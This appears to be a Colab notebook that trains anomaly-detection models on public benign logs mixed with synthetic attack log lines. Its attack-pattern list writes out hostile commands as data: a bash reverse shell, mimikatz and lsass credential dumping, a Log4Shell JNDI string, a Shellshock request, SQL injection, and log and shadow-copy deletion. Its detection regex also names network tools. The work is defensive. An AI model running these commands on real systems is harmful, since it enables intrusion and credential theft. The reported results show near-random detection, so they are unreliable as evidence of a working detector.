In [1]:
print("🚀 Setting up Project Quorum Training Environment...")

# Install dependencies
!pip install -q pandas numpy scikit-learn pyod joblib tensorflow tqdm combo

print("✅ Dependencies installed")

# Check GPU availability
import tensorflow as tf
print(f"\n🎮 GPU Available: {tf.config.list_physical_devices('GPU')}")

🚀 Setting up Project Quorum Training Environment...
  Preparing metadata (setup.py) ... [?25l[?25hdone
  Building wheel for combo (setup.py) ... [?25l[?25hdone
✅ Dependencies installed

🎮 GPU Available: []


In [2]:
print("\n📥 Downloading datasets...")

import pandas as pd
import numpy as np
from pathlib import Path

# Create directories
Path("training_data").mkdir(exist_ok=True)
Path("models_output").mkdir(exist_ok=True)

# Download benign logs
benign_urls = [
    ('hdfs', 'https://raw.githubusercontent.com/logpai/loghub/master/HDFS/HDFS_2k.log_structured.csv'),
    ('linux', 'https://raw.githubusercontent.com/logpai/loghub/master/Linux/Linux_2k.log_structured.csv'),
    ('apache', 'https://raw.githubusercontent.com/logpai/loghub/master/Apache/Apache_2k.log_structured.csv'),
    ('windows', 'https://raw.githubusercontent.com/logpai/loghub/master/Windows/Windows_2k.log_structured.csv'),
    ('bgl', 'https://raw.githubusercontent.com/logpai/loghub/master/BGL/BGL_2k.log_structured.csv'),
]

all_benign = []
for name, url in benign_urls:
    try:
        df = pd.read_csv(url)
        all_benign.append(df)
        print(f"✅ Downloaded {name}: {len(df)} samples")
    except Exception as e:
        print(f"⚠️ Failed to download {name}: {e}")

# Combine benign logs
benign_df = pd.concat(all_benign, ignore_index=True)
print(f"\n📊 Total benign samples: {len(benign_df)}")

# Generate attack logs
import random

attack_patterns = [
    "mimikatz.exe executed: sekurlsa::logonpasswords",
    "procdump64.exe -ma lsass.exe lsass.dmp",
    "powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcA",
    "cmd.exe /c whoami && net user && ipconfig /all",
    "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1",
    "psexec.exe \\\\192.168.1.50 -u admin -p password cmd.exe",
    "net use \\\\192.168.1.50\\C$ /user:administrator Password123",
    "wevtutil.exe cl System",
    "rm -rf /var/log/auth.log",
    "${jndi:ldap://malicious.com/a} - Log4Shell exploit",
    "GET /cgi-bin/test.cgi?() { :;}; /bin/bash -c 'cat /etc/passwd'",
    "vssadmin delete shadows /all /quiet",
    "File encrypted: document.docx -> document.docx.locked",
    "admin' OR '1'='1'-- detected in login parameter",
    "UNION SELECT username,password FROM users--",
    "Failed password for root from 192.168.1.100 port 22 ssh2",
    "sudo su - executed by user www-data",
]

attack_logs = []
for _ in range(int(len(benign_df) * 0.1)):  # 10% attacks
    pattern = random.choice(attack_patterns)
    pattern = pattern.replace('192.168.1', f'192.168.{random.randint(1,255)}')
    attack_logs.append(pattern)

attack_df = pd.DataFrame({
    'Content': attack_logs,
    'Label': ['Anomaly'] * len(attack_logs)
})

print(f"✅ Generated {len(attack_df)} synthetic attack samples")

# Combine all data
benign_df['Label'] = 'Normal'
final_df = pd.concat([
    benign_df[['Content', 'Label']],
    attack_df
], ignore_index=True)

# Shuffle
final_df = final_df.sample(frac=1, random_state=42).reset_index(drop=True)

print(f"\n📊 Final Dataset:")
print(f"   Total: {len(final_df)}")
print(f"   Normal: {sum(final_df['Label']=='Normal')} ({sum(final_df['Label']=='Normal')/len(final_df)*100:.1f}%)")
print(f"   Anomaly: {sum(final_df['Label']=='Anomaly')} ({sum(final_df['Label']=='Anomaly')/len(final_df)*100:.1f}%)")



📥 Downloading datasets...
✅ Downloaded hdfs: 2000 samples
✅ Downloaded linux: 2000 samples
✅ Downloaded apache: 2000 samples
✅ Downloaded windows: 2000 samples
✅ Downloaded bgl: 2000 samples

📊 Total benign samples: 10000
✅ Generated 1000 synthetic attack samples

📊 Final Dataset:
   Total: 11000
   Normal: 10000 (90.9%)
   Anomaly: 1000 (9.1%)


In [3]:
print("\n🔧 Feature Engineering...")

import re
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.preprocessing import StandardScaler

class SecurityFeatureExtractor:
    def __init__(self):
        self.ip_pattern = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
        self.port_pattern = re.compile(r':(\d{1,5})\b')
        self.error_pattern = re.compile(r'\b(error|fail|denied|unauthorized|forbidden|critical)\b', re.I)
        self.hex_pattern = re.compile(r'\b0x[0-9a-fA-F]+\b')
        self.suspicious_cmd = re.compile(r'\b(wget|curl|nc|bash|powershell|cmd|eval|exec)\b', re.I)

    def extract(self, message: str) -> dict:
        return {
            'has_ip': int(bool(self.ip_pattern.search(message))),
            'ip_count': len(self.ip_pattern.findall(message)),
            'has_port': int(bool(self.port_pattern.search(message))),
            'has_error': int(bool(self.error_pattern.search(message))),
            'has_hex': int(bool(self.hex_pattern.search(message))),
            'has_suspicious_cmd': int(bool(self.suspicious_cmd.search(message))),
            'message_length': len(message),
            'special_char_ratio': sum(1 for c in message if not c.isalnum()) / max(len(message), 1),
            'digit_ratio': sum(1 for c in message if c.isdigit()) / max(len(message), 1),
            'uppercase_ratio': sum(1 for c in message if c.isupper()) / max(len(message), 1),
        }

# TF-IDF features
print("  - TF-IDF vectorization...")
vectorizer = TfidfVectorizer(
    max_features=3000,
    ngram_range=(1, 3),
    max_df=0.9,
    min_df=3
)

messages = final_df['Content'].fillna('').tolist()
X_tfidf = vectorizer.fit_transform(messages).toarray()

# Security features
print("  - Security features...")
extractor = SecurityFeatureExtractor()
security_features = [list(extractor.extract(msg).values()) for msg in messages]
X_security = np.array(security_features)

# Scale security features
scaler = StandardScaler()
X_security_scaled = scaler.fit_transform(X_security)

# Combine
X_combined = np.hstack([X_tfidf, X_security_scaled])
y = (final_df['Label'] == 'Anomaly').astype(int).values

print(f"✅ Feature matrix: {X_combined.shape}")


🔧 Feature Engineering...
  - TF-IDF vectorization...
  - Security features...
✅ Feature matrix: (11000, 3010)


In [4]:
from sklearn.model_selection import train_test_split

X_train, X_test, y_train, y_test = train_test_split(
    X_combined, y, test_size=0.2, random_state=42, stratify=y
)

print(f"\n📊 Data Split:")
print(f"   Train: {len(X_train)} samples")
print(f"   Test: {len(X_test)} samples")
print(f"   Train anomaly rate: {sum(y_train)/len(y_train)*100:.1f}%")
print(f"   Test anomaly rate: {sum(y_test)/len(y_test)*100:.1f}%")


📊 Data Split:
   Train: 8800 samples
   Test: 2200 samples
   Train anomaly rate: 9.1%
   Test anomaly rate: 9.1%


In [5]:
print("\n🤖 Training Ensemble Models...")

from pyod.models.iforest import IForest
from pyod.models.lof import LOF
from pyod.models.combination import aom

# Model 1: Isolation Forest
print("  - Training Isolation Forest...")
iforest = IForest(
    contamination=0.1,
    n_estimators=200,
    max_samples=256,
    random_state=42,
    n_jobs=-1
)
iforest.fit(X_train)
print("    ✅ IForest trained")

# Model 2: LOF
print("  - Training LOF...")
lof = LOF(
    contamination=0.1,
    n_neighbors=20,
    algorithm='auto',
    n_jobs=-1
)
lof.fit(X_train)
print("    ✅ LOF trained")

print("✅ Ensemble models trained")


🤖 Training Ensemble Models...
  - Training Isolation Forest...
    ✅ IForest trained
  - Training LOF...
    ✅ LOF trained
✅ Ensemble models trained


In [6]:
print("\n🧠 Training Deep Learning Autoencoder...")

from tensorflow import keras

# Build autoencoder
encoder = keras.Sequential([
    keras.layers.InputLayer(input_shape=(X_train.shape[1],)),
    keras.layers.Dense(512, activation='relu'),
    keras.layers.Dropout(0.2),
    keras.layers.Dense(256, activation='relu'),
    keras.layers.Dropout(0.2),
    keras.layers.Dense(128, activation='relu'),
    keras.layers.Dense(64, activation='relu')
])

decoder = keras.Sequential([
    keras.layers.InputLayer(input_shape=(64,)),
    keras.layers.Dense(128, activation='relu'),
    keras.layers.Dense(256, activation='relu'),
    keras.layers.Dropout(0.2),
    keras.layers.Dense(512, activation='relu'),
    keras.layers.Dropout(0.2),
    keras.layers.Dense(X_train.shape[1], activation='sigmoid')
])

autoencoder = keras.Sequential([encoder, decoder])

autoencoder.compile(
    optimizer=keras.optimizers.Adam(learning_rate=0.001),
    loss='mse'
)

# Train on normal data only
X_train_normal = X_train[y_train == 0]

print(f"  - Training on {len(X_train_normal)} normal samples...")
history = autoencoder.fit(
    X_train_normal, X_train_normal,
    epochs=10,
    batch_size=256,
    validation_split=0.1,
    verbose=1,
    callbacks=[
        keras.callbacks.EarlyStopping(patience=3, restore_best_weights=True)
    ]
)

print("✅ Autoencoder trained")

# Convert to TFLite
print("\n📦 Converting to TFLite...")
converter = tf.lite.TFLiteConverter.from_keras_model(autoencoder)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
tflite_model = converter.convert()
print(f"✅ TFLite model size: {len(tflite_model) / 1024:.2f} KB")


🧠 Training Deep Learning Autoencoder...




  - Training on 8000 normal samples...
Epoch 1/10
[1m29/29[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m6s[0m 118ms/step - loss: 0.1792 - val_loss: 0.0032
Epoch 2/10
[1m29/29[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m3s[0m 110ms/step - loss: 0.0034 - val_loss: 0.0032
Epoch 3/10
[1m29/29[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m4s[0m 149ms/step - loss: 0.0034 - val_loss: 0.0032
Epoch 4/10
[1m29/29[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m3s[0m 111ms/step - loss: 0.0036 - val_loss: 0.0032
✅ Autoencoder trained

📦 Converting to TFLite...
Saved artifact at '/tmp/tmpe_lo6fj5'. The following endpoints are available:

* Endpoint 'serve'
  args_0 (POSITIONAL_ONLY): TensorSpec(shape=(None, 3010), dtype=tf.float32, name='keras_tensor_14')
Output Type:
  TensorSpec(shape=(None, 3010), dtype=tf.float32, name=None)
Captures:
  133122851919952: TensorSpec(shape=(), dtype=tf.resource, name=None)
  133122851921296: TensorSpec(shape=(), dtype=tf.resource, name=None)
  1331228

In [8]:
print("\n📊 Model Evaluation:")
print("="*70)

from sklearn.metrics import classification_report, roc_auc_score, confusion_matrix

# Ensemble evaluation
iforest_scores = iforest.decision_function(X_test)
lof_scores = lof.decision_function(X_test)
scores_matrix = np.column_stack([iforest_scores, lof_scores])
ensemble_scores = aom(scores_matrix, n_buckets=2)

threshold = np.percentile(ensemble_scores, 90)
predictions = (ensemble_scores > threshold).astype(int)

print("\n🔹 Ensemble Model (IForest + LOF):")
print(classification_report(y_test, predictions, target_names=['Normal', 'Anomaly']))

if len(np.unique(y_test)) > 1:
    auc = roc_auc_score(y_test, ensemble_scores)
    print(f"ROC-AUC Score: {auc:.4f}")

cm = confusion_matrix(y_test, predictions)
print(f"\nConfusion Matrix:")
print(f"  TN: {cm[0,0]}, FP: {cm[0,1]}")
print(f"  FN: {cm[1,0]}, TP: {cm[1,1]}")

# Autoencoder evaluation
print("\n🔹 Autoencoder Model:")
reconstructed = autoencoder.predict(X_test)
mse = np.mean(np.square(X_test - reconstructed), axis=1)
threshold_ae = np.percentile(mse, 90)
predictions_ae = (mse > threshold_ae).astype(int)

print(classification_report(y_test, predictions_ae, target_names=['Normal', 'Anomaly']))

if len(np.unique(y_test)) > 1:
    auc_ae = roc_auc_score(y_test, mse)
    print(f"ROC-AUC Score: {auc_ae:.4f}")


📊 Model Evaluation:

🔹 Ensemble Model (IForest + LOF):
              precision    recall  f1-score   support

      Normal       0.90      0.89      0.89      2000
     Anomaly       0.00      0.00      0.00       200

    accuracy                           0.81      2200
   macro avg       0.45      0.45      0.45      2200
weighted avg       0.82      0.81      0.81      2200

ROC-AUC Score: 0.4484

Confusion Matrix:
  TN: 1780, FP: 220
  FN: 200, TP: 0

🔹 Autoencoder Model:
[1m69/69[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m2s[0m 21ms/step
              precision    recall  f1-score   support

      Normal       0.93      0.92      0.92      2000
     Anomaly       0.25      0.28      0.26       200

    accuracy                           0.86      2200
   macro avg       0.59      0.60      0.59      2200
weighted avg       0.87      0.86      0.86      2200

ROC-AUC Score: 0.5706


In [10]:
print("\n💾 Saving models...")

import joblib

# Save PyOD models
joblib.dump(iforest, 'models_output/iforest_model.pkl')
joblib.dump(lof, 'models_output/lof_model.pkl')
joblib.dump(vectorizer, 'models_output/tfidf_vectorizer.pkl')
joblib.dump(scaler, 'models_output/security_features_scaler.pkl')

# Save TFLite
with open('models_output/autoencoder.tflite', 'wb') as f:
    f.write(tflite_model)

# Save metadata
import json
metadata = {
    'version': '2.0.0',
    'trained_date': pd.Timestamp.now().isoformat(),
    'samples': {
        'train': int(len(X_train)),
        'test': int(len(X_test)),
        'benign': int(sum(y_train==0)),
        'anomaly': int(sum(y_train==1))
    },
    'features': {
        'tfidf': int(X_tfidf.shape[1]),
        'security': int(X_security.shape[1]),
        'total': int(X_combined.shape[1])
    },
    'performance': {
        'ensemble_auc': float(auc),
        'autoencoder_auc': float(auc_ae)
    }
}

with open('models_output/model_metadata.json', 'w') as f:
    json.dump(metadata, f, indent=2)

print("✅ Models saved to models_output/")
print("\n📦 Files created:")
print("   - iforest_model.pkl")
print("   - lof_model.pkl")
print("   - tfidf_vectorizer.pkl")
print("   - security_features_scaler.pkl")
print("   - autoencoder.tflite")
print("   - model_metadata.json")


💾 Saving models...
✅ Models saved to models_output/

📦 Files created:
   - iforest_model.pkl
   - lof_model.pkl
   - tfidf_vectorizer.pkl
   - security_features_scaler.pkl
   - autoencoder.tflite
   - model_metadata.json


In [14]:
print("\n🧪 Testing Inference...")

test_logs = [
    "User root logged in successfully",
    "Connection established from 192.168.1.1",
    "mimikatz.exe executed: sekurlsa::logonpasswords",
    "powershell.exe -nop -w hidden -encodedcommand",
    "Failed password attempt for admin from 10.0.0.5",
]

# Prepare features
X_test_messages = vectorizer.transform(test_logs).toarray()
security_test = np.array([list(extractor.extract(msg).values()) for msg in test_logs])
security_test_scaled = scaler.transform(security_test)
X_test_combined = np.hstack([X_test_messages, security_test_scaled])

# Get predictions
iforest_test_scores = iforest.decision_function(X_test_combined)
lof_test_scores = lof.decision_function(X_test_combined)
test_scores_matrix = np.column_stack([iforest_test_scores, lof_test_scores])
ensemble_test_scores = aom(test_scores_matrix, n_buckets=2) # Set n_buckets to 2
test_predictions = (ensemble_test_scores > threshold).astype(int)

print("\n" + "="*70)
for log, score, pred in zip(test_logs, ensemble_test_scores, test_predictions):
    status = "🚨 ANOMALY" if pred == 1 else "✅ NORMAL"
    print(f"{status} | Score: {score:.4f} | {log[:50]}...")
print("="*70)


🧪 Testing Inference...

🚨 ANOMALY | Score: 4470577.7140 | User root logged in successfully...
🚨 ANOMALY | Score: 2.5225 | Connection established from 192.168.1.1...
✅ NORMAL | Score: 0.4889 | mimikatz.exe executed: sekurlsa::logonpasswords...
🚨 ANOMALY | Score: 11288153395.2487 | powershell.exe -nop -w hidden -encodedcommand...
🚨 ANOMALY | Score: 2.7406 | Failed password attempt for admin from 10.0.0.5...


In [15]:
print("\n📥 Download models to your local machine:")
print("\n# Run this code block to download as ZIP:")
print("""
!zip -r project_quorum_models.zip models_output/
from google.colab import files
files.download('project_quorum_models.zip')
""")

print("\n✅ TRAINING COMPLETE!")
print("\nNext steps:")
print("1. Download the ZIP file")
print("2. Extract to backend/data/models/")
print("3. Integrate detection engine")
print("4. Test the API")


📥 Download models to your local machine:

# Run this code block to download as ZIP:

!zip -r project_quorum_models.zip models_output/
from google.colab import files
files.download('project_quorum_models.zip')


✅ TRAINING COMPLETE!

Next steps:
1. Download the ZIP file
2. Extract to backend/data/models/
3. Integrate detection engine
4. Test the API
